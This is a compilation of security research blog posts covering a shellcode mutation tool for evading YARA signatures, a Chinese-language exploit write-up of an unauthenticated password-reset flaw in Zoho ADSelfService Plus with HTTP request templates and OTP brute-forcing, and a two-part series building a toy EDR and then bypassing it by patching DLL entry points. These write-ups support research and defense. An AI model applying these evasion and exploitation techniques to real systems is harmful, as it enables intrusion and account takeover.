If we were to write a very quick yara rule for this, we may choose to focus on the initial bytes which perform some setup. Replacing the offsets (e.g. [rbx + 0x113]) with wildcards and taking the bytes up to the second call at 0x0000001b we can write a quick yara rule that matches the shellcode in memory and on disk, but nothing else in e.g. C:\Windows\System32 (testing for false positives).

A quick-and-dirty yara rule for the shellcode.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

The rule matches the shellcode on disk and in memory and triggers no false positives against anything in C:\Windows\System32.

So we have a reliable yara rule and add it to our threat hunts, all good right?

Shellcode Mutator

This is where the Shellcode Mutator project comes in. This simple python script will parse nasm source code and insert sets of instructions at random intervals that ‘do nothing’, but will then alter and byte order and file hash of the shellcode at the cost of increased size.

The script is easy enough to use, taking a source code ‘template’, an out file, a morph percentage and a flag to set x86 vs x64 mode.

Help text for shellcode mutator.

This script has some basic logic to check source lines but essentially has to sets of instructions that can be expanded upon, one for x86 and one for x64. Each entry in these instruction sets should, after all instructions have executed, leave all registers and flags in the same state as before they were executed to ensure that the shellcode can continue without erroring.

The default "no instructions" sets.

Along with some other logic, the script will place these instruction sets at random intervals (dictated by the morph percentage) before the instructions specified in the assembly_instructions variable:

Instructions that are used as triggers for the mutations.

If we run the script against our MessageBox shellcode, setting a morph percentage of 15% we get a source code file that is 57 lines instead of 53. Compiling that shellcode and executing the yara search shows that it is not caught and only the original shellcode matches.

The mutated MessageBox shellcode no longer matches our yara rule.

Examining the disassembly of the binary file shows that it has inserted a nop (0x90) instruction into the bytes that we matched upon (in addition to at other places). This of course also changed the file hash.

The instruction that caused our yara rule not to match.

There is an element of luck of course. We need to make sure that we change enough bytes that any yara rules will no longer match without actually knowing what those yara rules are (or any other detections). Increasing the morph percentage then will increase the number of alterations made and the likelihood of bypassing any rules at the cost of increased shellcode size.

Of course the big question is, does our shellcode still run?

Testing the morphed shellcode still works!

Winning!

Download Shellcode Mutator

github GitHub: https://github.com/nettitude/ShellcodeMutator

References

The post Avoiding Detection with Shellcode Mutator appeared first on LRQA Nettitude Labs.

CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus

By: Skay
10 March 2023 at 15:12

一、组件概述

1.关键词

AD、云应用、单点登录

2.概述

ZOHO ManageEngine ADSelfService Plus是美国卓豪(ZOHO)公司的针对 Active Directory 和云应用程序的集成式自助密码管理和单点登录解决方案。允许最终用户执行密码重置,帐户解锁和配置文件信息更新等任务,而不依赖于帮助台。ADSelfService Plus提供密码自助重置/解锁,密码到期提醒,自助服务目录更新程序,多平台密码同步器以及云应用程序的单点登录。

3.使用范围及行业分布

大中小型企业,内部使用windows域管理

二、环境搭建、动态调试

1.环境搭建

各版本下载地址,下载exe一键安装即可

https://archives.manageengine.com/self-service-password

安装后默认用户密码admin、admin,访问8888 端口

2.动态调试

修改conf/wrapper.conf 文件,添加JDWP调试参数

成功debug

组件web服务由Tomcat启动,Tomcat版本xxx,启动脚本为bin/runAsAdmin.bat,主配置文件\conf\wrapper.conf,配置了各项启动参数,最终完全启动参数如下

"..\jre\bin\java" -Dcatalina.home=.. -Dserver.home=.. -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=10010,server=y,suspend=n -Duser.home=../logs -Dlog.dir=../logs -Ddb.home=../pgsql -Dcheck.tomcatport="true" -Dproduct.home=.. -DHTTP_PORT=8888 -DSSL_PORT=9251 -Dfile.encoding=UTF-8 -Djava.io.tmpdir=../temp -XX:OnOutOfMemoryError="SetMaxMemory.bat" -Dhaltjvm.on.dbcrash="true" -Dorg.apache.catalina.SESSION_COOKIE_NAME=JSESSIONIDADSSP -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -XX:-CreateMinidumpOnCrash -Dmail.smtp.timeout=30000 -Dorg.apache.catalina.authenticator.Constants.SSO_SESSION_COOKIE_NAME=JSESSIONIDADSSPSSO -Xms50m -Xmx256m -Djava.library.path="../lib/native;../jre/lib" -classpath "略" -Dwrapper.key="PIskDhkG89EFqv0f0ijb69bgHwHC9ybE" -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=2884 -Dwrapper.version="3.5.35-pro" -Dwrapper.native_library="wrapper" -Dwrapper.arch="x86" -Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1 -Dwrapper.lang.domain="wrapper" -Dwrapper.lang.folder="../lang" org.tanukisoftware.wrapper.WrapperSimpleApp com.adventnet.start.ProductTrayIcon conf/TrayIconInfo.xml StartADSM

启动入口方法为com.adventnet.start.ProductTrayIcon#main,启动过程这里不展开详细分析

路由

入手点为web.xml ,梳理后,可以将路由做大致如下分类

/RestAPI/ => org.apache.struts.action.ActionServlet

/api/json/ => com.manageengine.ads.fw.api.JSONAPIServlet

/ServletAPI/* /RestAPI/WC/Clustering/* /RestAPI/Clustering/* /m/mLoginAction

/m/mSelfService /m/mMFA => com.manageengine.ads.fw.common.api.ServletAPI

以及在web.xml 中单独配置的一些sevlet

身份校验

这里针对此漏洞着重对RestAPI展开分析

web.xml 中对/RestAPI/WC/* 路由做了身份校验,其它路由未进行配置。

关于RestAPI相关的校验在ADSFilter 全局filter中做了操作,判断了是否为RestAPI接口,如果是,将进入com.manageengine.ads.fw.api.RestAPIFilter#doAction,进入不同的校验逻辑。

这里的身份校验,

RestAPI的重点校验逻辑在RestAPIFilter中,而更加具体的校验存在数据库中

select * from ADSProductAPIs

大概分为这几类:需要session,需要HANDSHAKE_KEY,无需身份校验。

其它安全机制

security.xml

这里列出了每个API的参数(类型,长度,正则),请求方法,是否需要csrf等

四、CVE-2022-36413

Zoho ManageEngine ADSelfService Plus支持第三方登录方式,前提条件需要后台配置身份校验数据库

http://192.168.33.33:8888/webclient/index.html?#/configuration/selfservice/idm-applications

身份验证绕过部分也还是利用了RestSAPI,我们知道RestAPI的身份校验逻辑是ADSFilter 全局filter中做了操作,判断了是否为RestAPI接口,如果是,将进入

com.manageengine.ads.fw.api.RestAPIFilter#doAction做具体的权限验证,

这里判断接口是否需要权限认证存储在PostgreSQL中,

select * from ADSProductAPIs

很幸运的,我们找到了三个未授权接口来完成这个任意密码重置

Step 1:PM_INITIAILIZE_AGENT

POST /RestAPI/PMAgent/****** HTTP/1.1
Host: 192.168.33.133:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Time:1656925239
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.33.133:8888/webclient/index.html?
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
 
something

这里的一些参数需要特殊构造,首先是时间戳,这个比较好解决

然后是machineName,如果在当前域,容易得到 PS:无需登录即可获取域名

opt参数,这个参数是一个六位数字,容易暴力破解,此参数校验逻辑如下com.manageengine.adssp.server.api.authorization.PasswordSyncAgentAPIAuthorizer#verifyAgent if ((new Date()).getTime() / 1000L - requsetTime < 300L && requsetTime - (new Date()).getTime() / 1000L < 300L)

我们有五分钟的时间来使用爆破

com.adventnet.iam.security.DoSController#controlDoS防御暴力破解是在这里完成的,

时间戳不变,每个ip地址可以发送1000个请求 100000/1000 = 100

综上所述,我们可以在可接受的时间内获取otp参数,而且使用像亚马逊或谷歌这样的云服务提供商,那实际上很容易。执行一百万个代码的完整攻击将花费大约 150 美元

这里展示了真实攻击的案例:https://thezerohack.com/hack-any-instagram

成功获取加密码加解密key

Step 2:PM_PASSWORD_SYNC

POST /RestAPI/PMAgent/****** HTTP/1.1
Host: 192.168.33.33:8888
Time:1657012207
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/2010101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
REMOTE_USER_IP:127.0.0.1
ZSEC_PROXY_SERVER_NAME:aaa
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
X-Forwarded-For:127.0.0.1
Referer: http://192.168.33.33:8888/webclient/index.html?
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
 
otp=294608&operation=passwordSync&username=254,147,58,204,126,202,25,240,150,20,124,148,236,167,85,25,16&machineName=TEST-DC-01.test.com&password=254,147,58,204,126,202,25,240,150,20,124,148,236,167,85,25,16&time=165512621862411&PRODUCT_NAME=nnn&domainName=test.com&machineFQDName=TEST-DC-01.test.com

重置用户名和密码,我们可以通过PM_INITIALIZE_AGENT操作,但是用户名密码需要加密下

程序通过动态加载动态链接库实现的AES加密,解密需要做一些处理,通过分析ManageEngineADSFramework.dll,本地构造出加密后的用户名密码

成功修改用户名密码

五、参考链接

https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-36413.html

Lets Create An EDR… And Bypass It! Part 1

By: CCob
27 May 2020 at 18:50

I was initially intending on writing a blog post on bypassing EDR solutions using a method I have not seen before. But after some thought of how I would demonstrate this, I decided on actually creating a basic EDR first. Hopefully this will share some insights on how they work in addition to methods of bypass.

There are a range of methods that Anti Virus and EDR solutions use to detect malicious programs or behaviors.

Signature Detection

As the name implies, signature detection is the process of analyzing the signatures of files for known malware previously seen before. This can be something as simple as comparing a SHA1 hash of a file with a known database of malware. Generally signature detection is implemented at kernel level using file system filters. For example, Microsoft have a specific technology built into Windows for this very purpose. Files are scanned during the opening phase and if the file is deemed malicious, the filter driver will block access to the file from the calling application. Signature detection is usually the first line of defense employed by AV’s and EDR’s.

Sandboxing

If signature detection fails to stop the latest and greatest malware from running, the EDR’s next line of defence is sandboxing. Prior to allowing any executable from running, EDR’s will run the potentially malicious program inside a virtual machine. Not the kind we run our own virtual machines inside, but one designed to analyze program flow and look for known malware through dynamic analysis. Some vendors claim to have special AI engines that analyse program flow etc…, so how these are implemented are somewhat of a black box. I personally believe they are done through control flow graph (CFG) analysis. The advantage of CFG analysis means the re-compilation of binaries or other small changes will still produce the same CFG regardless of the resulting executable being different. Whilst the EDR sandbox is a decent line of defence, it can succumb to various bypasses.

The first is time. The virtual machine will only spend a finite amount of time analyzing executables. So if there is enough complexity in the program being virtualized, eventually the sandbox will give up if it hasn’t found the binary to be malicious in nature in that time.

The second bypass method that is commonly used to thwart the sandbox is breaking up control flow to prevent further analysis. As mentioned earlier, the sandbox is essentially a virtual machine, but there will be certain OS API calls that it cannot really virtualize successfully. When this occurs, the sandbox will not be able to carry on analyzing program flow and generally give up and let the program continue on it’s merry path.

Active Protection

The next stage of protection employed by these solutions is something I call active protection. Different products market this under different names. It’s generally implemented through loading a DLL into each process and implementing API function hooks (more on this later) to analyse and monitor for suspicious behaviors that are not generally found when running benign programs.

A simplified version of active protection is what I will be looking to implement as part 1 of this series. In part 2 I’ll cover bypassing this method using a technique I’ve not seen used before, but with the same ultimate goal. Making the malware API calls invisible to the active protection.

Event Tracing

I’d be remiss if I did not mention event tracing. All the methods above are proactive forms of protection, designed to stop malware from executing. Event tracing is the reactive component to an EDR’s arsenal. When all proactive protections have failed, event tracing is used to analyze a series of events that have occurred and tie these to behaviors found when executing malware. Some of you maybe familiar with sysmon, and essentially EDR vendors implement their own implementation of sysmon to achieve the same goals.

So with the various methods covered, lets dive in.

SylantStrike

Welcome to SylantStrike, the most sophisticated open source Windows EDR solution available on the market…. hmm, well, not quite.

OK, so as mentioned earlier in the article, the area that we will be looking to implement in our super cool EDR solution is the active protection component. Generally this is implemented using function hooks. So what is a function hook? A function hook is essentially a method of changing the behavior of a pre-existing API by redirecting execution of the function to user controlled code.

Take a look at the jsfiddle below. We essentially replace the default window.alert function and add some custom behavior to it. The concept is no different to this.

It would be awesome if native API’s could be replaced as easy as the fiddle above, but at a native level it’s a little more complex. Hooking native API’s involve patching the first instruction of the API we are looking to intercept with a JMP instruction to our intercepted version of the API call. If you are interested in more technical details regarding native inline function hooks, head over to MalwareTech’s blog, he has a great post describing Inline Hooking.

Luckily for us there are an array of libraries already available that make the hooking processes a breeze. Check out the listing here on GitHub for some of the libraries available.

For SylantStrike I decided to go with MinHook. It supports both x86 and AMD64 architectures and is fairly minimal in terms of source files to include into our uber cool EDR solution.

Active Protection DLL

Now that we have decided on a hooking library, lets take a look at our basic DLL entry point for implementing our active protection DLL. The active protection is implemented as a DLL since it will eventually be loaded into all of the processes we are looking to protect.

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"

#include "minhook/include/MinHook.h"
#include "SylantStrike.h"

DWORD WINAPI InitHooksThread(LPVOID param) {

    //MinHook itself requires initialisation, lets do this
    //before we hook specific API calls.
    if (MH_Initialize() != MH_OK) {
        OutputDebugString(TEXT("Failed to initalize MinHook library\n"));
        return -1;
    }

    //Now that we have initialised MinHook, lets prepare to hook NtProtectVirtualMemory from ntdll.dll
    MH_STATUS status = MH_CreateHookApi(TEXT("ntdll"), "NtProtectVirtualMemory", NtProtectVirtualMemory, 
                                           reinterpret_cast<LPVOID*>(&pOriginalNtProtectVirtualMemory));  

    //Enable our hooks so they become active
    status = MH_EnableHook(MH_ALL_HOOKS);

    return status;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {
        //We are not interested in callbacks when a thread is created
        DisableThreadLibraryCalls(hModule);

        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_PROCESS_DETACH:

        break;
    }
    return TRUE;
}

The DllMain function above is the entry point to our protection DLL. Whenever the DLL is loaded using the LoadLibrary API, the function is called automatically along with the DLL_PROCESS_ATTACH reason. The code then creates a separate thread to setup our hooked functions. Ideally we should do this inline and not within a separate thread, but there is very little that can executed inside DllMain without creating deadlocks, so we delegate to a thread instead.

The responsibility of the InitHooksThread function is to initialise the MinHook library itself, setting up each individual function we are interested in hooking, then finally enabling the hooks.

One of the many API’s that EDR solutions will hook is the NtProtectVirtualMemory API. This function enables an application to change the memory protection options for a specific range of memory. Memory can be marked as read only (RO), read write (RW), read execute (RX) or read/write execute (RWX). RWX is what our trusty EDR solution will be looking for. RWX is seldom required for generic application code, but malware will quite often request this mode of protection due to the nature of how malicious code functions. A typical example is AMSI bypass. AMSI bypasses usually involve patching the AmsiScanBuffer API at runtime to change its behaviour to always return a clean result. This will usually involve a call to NtProtectVirtualMemory to change the memory protection from RX to RWX for a short period of time whilst the patch is applied. Ergo, an update of a memory range’s protection flags to RWX is what we are going to implement within our EDR.

// SylantStrike.cpp : Hooked API implementations
//

#include "pch.h"
#include "framework.h"
#include "SylantStrike.h"

//Pointer to the trampoline function used to call the original API.
//This will be initialised by MinHook during initialisation.
pNtProtectVirtualMemory pOriginalNtProtectVirtualMemory = nullptr;

DWORD NTAPI NtProtectVirtualMemory(IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PULONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection) {

	//Check to see if the calling application is requesting RWX
	if ((NewAccessProtection & PAGE_EXECUTE_READWRITE) == PAGE_EXECUTE_READWRITE) {
		//It was, so notify the user of naughty behaviour and terminate the running program
		MessageBox(nullptr, TEXT("You've been a naughty little hax0r, terminating program"), TEXT("Hax0r Detected"), MB_OK);
		TerminateProcess(GetCurrentProcess(), 0xdead1337);
		//Unreachable code
		return 0;
	}

	//No it wasn't, so just call the original function as normal
	return pOriginalNtProtectVirtualMemory(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection);
}

The hooked version of NtProtectVirtualMemory checks the NewAccessProtection flag to determine if the application is requesting the RWX protection level on the memory range. If RWX is requested then we simply alert the user to the suspicious activity and terminate the offending process. If RWX is not requested, the code simply calls the original NtProtectVirtualMemory API and returns the result.

And that is it, excluding third party code, in little more than 75 lines of code, we have implemented a very basic EDR solution that will terminate any program that tries to change the protection mode of any memory to RWX.

Injector

With the active protection DLL in place, we now need a way to have each process load the DLL on startup. SylantStrikeInject to the rescue, a C# program that will monitor and load our protection DLL into foreign processes. There are various ways EDR’s will do this. Many will chose the PsSetCreateProcessNotifyRoutine to monitor for process creation, but the drawback is that this API can only be used from within a driver, and since we are implementing a simple EDR, we don’t want to be going down that route. So instead we can use WMI to monitor for new process events.

       static void WaitForProcess()
        {
            try
            {
                var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ProcessStartTrace"));
                startWatch.EventArrived += new EventArrivedEventHandler(startWatch_EventArrived);
                startWatch.Start();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine($"+ Listening for the following processes: {string.Join(" ", processList)}\n");
            }
            catch (Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine(ex);
            }
        }

When a new process is launched, the startWatch_EventArrived function will be called with details of the process that has started.

       static void startWatch_EventArrived(object sender, EventArrivedEventArgs e)
        {
            try
            {
                var proc = GetProcessInfo(e);
                if (processList.Contains(proc.ProcessName.ToLower()))
                {
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.WriteLine($" Injecting process {proc.ProcessName}({proc.PID}) with DLL {dllPath}");
                    BasicInject.Inject(proc.PID, dllPath);
                }
            }
            catch (Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine(ex);
            }
        }

We then check that the process that has just started is on our list of names to inject our protection DLL, afterall, we don’t want to inject everything for our demo EDR. If the process is on our list of processes to inject, the code calls BasicInject.Inject to handle the loading of the DLL into the foreign executable.

    public static int Inject(int pid, string dllName) {

        // geting the handle of the process - with required privileges
        IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid);

        // searching for the address of LoadLibraryA and storing it in a pointer
        IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

        // alocating some memory on the target process - enough to store the name of the dll
        // and storing its address in a pointer
        IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

        // writing the name of the dll there
        UIntPtr bytesWritten;
        WriteProcessMemory(procHandle, allocMemAddress, Encoding.ASCII.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);

        // creating a thread that will call LoadLibraryA with allocMemAddress as argument
        CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);

        return 0;
    }

The inject code allocates a block of memory to hold the path to our protection DLL and writes the full path into the remote process’s memory space. The code also determines where the address of the LoadLibraryA function resides in memory. Once these steps have been performed, a thread is created in the remote process using the address of the LoadLibrary API call, and the thread parameter is the address of where the active protection DLL path exists in memory. Once the thread is created, the active protection DLL will be loaded by the remote process.

And we are done, we have our active protection DLL and C# loader ready to rock.

Demo

So first things first is to start SylantStrikeInject to monitor for process creation and inject the protection DLL. Process monitoring using WMI relies on administrative permissions, so SylantStrikeInject should be launched from an elevated command prompt. For this demonstration we are only interested in protecting notepad and calc.

.\SylantStrikeInject.exe --process=notepad.exe --process=calc.exe --dll=c:\tools\SylantStrike\SylantStrike.dll
Waiting for process events
+ Listening for the following processes: notepad.exe calc.exe

 Injecting process notepad.exe(22808) with DLL c:\tools\SylantStrike\SylantStrike.dll

Launching notepad will trigger the injection of SylantStrike and will protect notepad from any code that attempts to adjust memory protection to RWX.

Confirmation DLL loaded using ProcessHacker’s Modules list on notepad.exe

To confirm our protection is active and working I’m going to use the awesome Donut tool from @TheRealWover. Donut can convert multiple types of EXE/DLL’s into position independant shellcode that can be injected into foreign processes.

 C:\Tools\donut\donut.exe -a 2 DemoCreateProcess.dll -c TestClass -m RunProcess -p "calc.exe"

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "DemoCreateProcess.dll"
  [ Entropy       : Random names + Encryption
  [ File type     : .NET DLL
  [ Class         : TestClass
  [ Method        : RunProcess
  [ Parameters    : calc.exe
  [ Target CPU    : amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"

The command above uses Donut’s DemoCreateProcess library which will attempt to launch a process. This is then converted into shellcode and stored inside a file called loader.bin

Our next step is to load the generated shellcode into our notepad process that is actively protected by SylantStrike. There are loads of methods available to inject shellcode into a foreign process but for this demonstration I’m going to use CobaltStrike.

Using the shinject beacon command, we choose our notepad PID and path to the donut generated shellcode.

Once the shellcode is loaded into notepad and begins executing, the malicious little blighter is stopped in its tracks by SylantStrike’s protection.

If you are interested in having a go yourself, head over to the SylantStrike repo on GitHub.

Conclusion

In this example here I am only demonstrating one particular function hook and suspicious behavior. In reality there are numerous API hooks and suspicious behaviours a fully fledged EDR will look out for.

In part 2 I will cover a few methods on how our new EDR solution can be bypassed, so until then, thanks for reading.

Acknowledgements

The post Lets Create An EDR… And Bypass It! Part 1 appeared first on Ethical Chaos.

Lets Create An EDR… And Bypass It! Part 2

By: CCob
14 June 2020 at 10:47

In part one of this series we created a basic active protection EDR that terminated any program that modified memory for RWX. This was accomplished by hooking the VirtualProtect API and monitoring for the RWX memory protection flags. Check out part 1 of this series for a more detailed description on how this was done.

In part 2 I’m going to cover some bypass methods that I have seen others document and then demonstrate another method along with accompanying code.

OK, so with the introduction out the way, what methods are currently in use and the pros and cons of each bypass.

Blending in

The simplest of the methods doesn’t involve any magic at all and is all about blending in. The EDR hooks remain in place but don’t alert on any suspicious activity due the implementation of the malware. A good example of bypassing our EDR from part 1 would be to ensure that you never change or allocate memory for RWX. If you need to allocate new code or update existing code use RW mode first, then change to RX once the update is complete. If the code has no option to behave in suspicious ways, it’s time to look at bypass methods.

Unhooking

Unhooking the hooked API calls is another option. This involves reversing the operation that the EDR’s implement when patching the hooked API’s. Generally this involves loading a clean copy of the hooked DLL’s from disk and overwriting the hooked functions code. Typically this is usually only 5 bytes per hooked function. There are a few examples of how this can be done, but one such example can be found on the ired.team website. Unhooking could potentially be detected by EDR’s during this process.

Direct syscall instructions

By far the most effective solution is direct syscall instructions. This is where the malware does not make calls to the API’s themselves but implements the same stub code that the lowest level API calls implement prior to transferring to kernel mode. Since no API calls are made prior to hitting kernel code, the EDR is blind to these types of calls. This is due to the fact that generally all EDR’s implement the active protection in-process within userland code, which inherently is their weakness.

Direct syscall bypass comes at a price though. It’s by far the hardest to get right and the most verbose in code terms. Since direct syscalls are utilising the lowest level of API’s there is a ton of boilerplate needed for some functions to be called correctly. Let’s take the higher level CreateProcess API. If you wanted to create a process using syscalls only, you probably need to implement somewhere in the region of 20-30 syscall implementations. Take a look at ReactOS’s implementation of CreateProcessInternal if you don’t believe me.

Other complications that come from using direct syscalls is 32bit processes running on 64bit. 32bit programs actually switch to 64bit prior to making the syscall and then back again when returning from kernel land. Syscall indexes can also change between versions of Windows. Syscalls are implemented using a table within the kernel with the index used to reference a particular syscall. This index can change, so again, something that needs to be considered.

I have seen some excellent work in this area recently that makes the process easier. Here are some great examples

Microsoft Signed DLL Process Mitigation Policy

Another method of bypassing EDR’s can be achieved by enabling the Microsoft Signed DLL Process Mitigation Policy. Wow, that’s a mouthful. The policy is designed to prevent any DLL that is not signed by Microsoft from loading into any process where the policy is enabled. This prevents EDR’s that have not been signed or cross-signed by Microsoft from loading into the process.

ired.team have covered this method on their blog post and infact is the same solution implemented by Cobalt Strike’s blockdlls command. The policy can be enabled in-process, but it does not prevent DLL’s that have not been loaded already. This generally means it’s only effective on child processes created by your malare. It’s a simple solution to implement but all bets are off if the EDR’s active protection DLL is cross-signed by Microsoft or if Microsoft themselves implement active protection EDR within the likes of Windows Defender ATP. The policy will also prevent the malware from loading other non Microsoft DLL’s that it may need to function.

SharpBlock

Now that we have covered many of the EDR bypass solutions in use today, I’d like introduce SharpBlock. It’s just another method that I thought could be used for bypassing EDR’s that I don’t think I’ve seen used before (please let me know if you do find something).

SharpBlock can be used to load a child process and prevent any DLL from hooking into the child process. Since it specifically targets a DLL from hooking, it will still allow other DLL’s from loading into the process.

How does it work?

When SharpBlock spawns the requested child process, it uses the Windows Debug API to listen for debug events during the lifecycle of the child process. When a process is being debugged, the parent debugger process will receive these events, but the child process will be paused during this time. The fact the child process is paused during these events is a key element to why this method works. So what events are fired when debugging a process.

CREATE_PROCESS_DEBUG_EVENTFired on initial process creation, incuding child processes.
CREATE_THREAD_DEBUG_EVENTFired when a new thread is created.
EXCEPTION_DEBUG_EVENTFired when an exception occurs.
EXIT_PROCESS_DEBUG_EVENTA process has exited, including a child process.
EXIT_THREAD_DEBUG_EVENTA thread has exited
LOAD_DLL_DEBUG_EVENTA DLL has loaded within a process or one of it’s children.
OUTPUT_DEBUG_STRING_EVENTDebug strings written using the OutputDebugString API
RIP_EVENTRIP event?
UNLOAD_DLL_DEBUG_EVENTA DLL has unloaded within the debugged process or it’s children.
Debug Events

As I’m sure you have guessed by now, the particular event we are interested in is LOAD_DLL_DEBUG_EVENT. When a debugged process or one of it’s children load’s a DLL, we want to know about it.

Once we receive the event and determine it’s a DLL we would like to block, then how do we actually block it’s behavior? Well lets revisit our DLL entry point from our uber cool EDR, SylantStrike.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: {
        //We are not interested in callbacks when a thread is created
        DisableThreadLibraryCalls(hModule);

        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_PROCESS_DETACH:

        break;
    }
    return TRUE;
}

What if we change the entry points behavior to the equivalent code?

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    return TRUE;
}

If we patched the code at runtime to essentially implement this behavior, the InitHooksThread function is never called, and ergo the hooks are never put in place. We can accomplish this with the 0xC3 opcode, which translates to the x86/x64 ret instruction. If we patch the entry point function with 0xC3 at the beginning, we should get the desired effect. Before we can patch the entry point though, we need to figure out where that is.

            PE.IMAGE_DOS_HEADER dosHeader = (PE.IMAGE_DOS_HEADER)Marshal.PtrToStructure(mem, typeof(PE.IMAGE_DOS_HEADER));
            PE.IMAGE_FILE_HEADER fileHeader = (PE.IMAGE_FILE_HEADER)Marshal.PtrToStructure( new IntPtr(mem.ToInt64() + dosHeader.e_lfanew) , typeof(PE.IMAGE_FILE_HEADER));

            UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
            IntPtr entryPoint;
            if ( (fileHeader.Characteristics & IMAGE_FILE_32BIT_MACHINE) == IMAGE_FILE_32BIT_MACHINE) {
                PE.IMAGE_OPTIONAL_HEADER32 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER32)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER32));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt32());

            } else {
                PE.IMAGE_OPTIONAL_HEADER64 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER64)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER64));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt64());                
            }

The code above analyses the PE header of the DLL that is in the process of being loaded to find out where the DLL entry point resides. I should note that the DLL entry point does not actually point to DllMain, but usually the C runtime initialiser that will eventually call DllMain. But for all intents and purposes we’ll call it DllMain.

Once we have calculated the final address of the entry point, we can then use the WriteProcessMemory API call to write over the entry point with the ret instruction.

                Console.WriteLine("[+] Patching DLL Entry Point at 0x{0:x}", entryPoint.ToInt64());

                if (PInvokes.WriteProcessMemory(hProcess, entryPoint, retIns, 1, out bytesWritten)) {
                    Console.WriteLine("[+] Successfully patched DLL Entry Point");
                } else {
                    Console.WriteLine("[!] Failed patched DLL Entry Point");
                }

Finally, we can trigger the process to continue on it’s merry path without the EDR hooks being applied.

PInvokes.ContinueDebugEvent((uint)DebugEvent.dwProcessId,                               
                        (uint)DebugEvent.dwThreadId,
                        dwContinueDebugEvent);

Demo

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -h, --help                 Display this help

SharpBlock will default to launching cmd without any arguments, but this can be overridden with the -e and -a arguments respectively. The rest of the arguments can be specified multiple times to block any DLL from it’s name on disk, the copyright value within the version info, the product value from the version info or the description value from the version info. A DLL’s version info can be found in the Details tab when viewing the file’s properties from explorer.

Going back to our example EDR from part one, this time we load notepad.exe using SharpBlock

